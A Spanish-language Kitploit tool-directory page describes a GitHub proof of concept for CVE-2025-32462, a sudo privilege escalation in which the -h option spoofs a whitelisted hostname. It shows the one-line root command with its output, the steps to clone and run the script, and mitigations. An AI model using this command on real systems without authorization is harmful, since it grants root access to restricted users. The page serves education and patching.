Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-32462-Exploit — Exploit CVE-2025-32462 | Kitploit
Herramientas/GitHubGitHub/cybersentinelx1/cve-2025-32462-exploit
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubcybersentinelx1/cve-2025-32462-exploit

CVE-2025-32462-Exploit

Exploit CVE-2025-32462

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
1hace 1 añoAún no revisado

CVE-2025-32462-Exploit: Matrix-Sudo Escape

Escalada de privilegios mediante suplantación de hostname (CVE-2025-32462)

"Tomas la píldora azul... la historia termina. Tomas la píldora roja... obtienes root."

Descripción

Este exploit demuestra una vulnerabilidad de escalada de privilegios en sudo (CVE-2025-32462) donde las restricciones basadas en hostname pueden ser omitidas usando el parámetro -h. El PoC crea un entorno de usuario restringido y luego lo evade suplantando un hostname en la lista blanca para obtener acceso root.

root@kitploit:~
[user@matrix-node]$ sudo -h zion-core bash  # Suplanta hostname en lista blanca
[root@matrix-node]# id                          # ¡Obtuviste root en el hostname incorrecto!
uid=0(root) gid=0(root) groups=0(root)

Detalles técnicos

  • Versiones de sudo vulnerables: < 1.9.17
  • Vector de ataque: Escalada local de privilegios
  • Fallo clave: Omisión de la verificación de hostname mediante el parámetro sudo -h
  • Impacto: Usuarios restringidos pueden obtener root en sistemas mal configurados

Uso

Clonar el repositorio:

root@kitploit:~
git clone https://github.com/cybersentinelx1/CVE-2025-32462-Exploit.git
cd matrix-sudo-escape

Hacer ejecutable y ejecutar:

root@kitploit:~
chmod +x matrix-sudo-escape.sh
./matrix-sudo-escape.sh

Siga las indicaciones interactivas para demostrar:

  • Detección de la vulnerabilidad CVE-2025-32462
  • Creación de usuario
  • Configuración de restricción de hostname
  • Ejecución del exploit
  • Limpieza

Protección

  • ✅ Actualice sudo a v1.9.17+
  • ✅ Evite restricciones de sudo basadas en hostname
  • ✅ Use políticas de sudo basadas en grupos

Legal

Solo para fines educativos/de investigación. Úselo únicamente en sistemas de su propiedad o sobre los cuales tenga permiso para realizar pruebas.

Descargar herramienta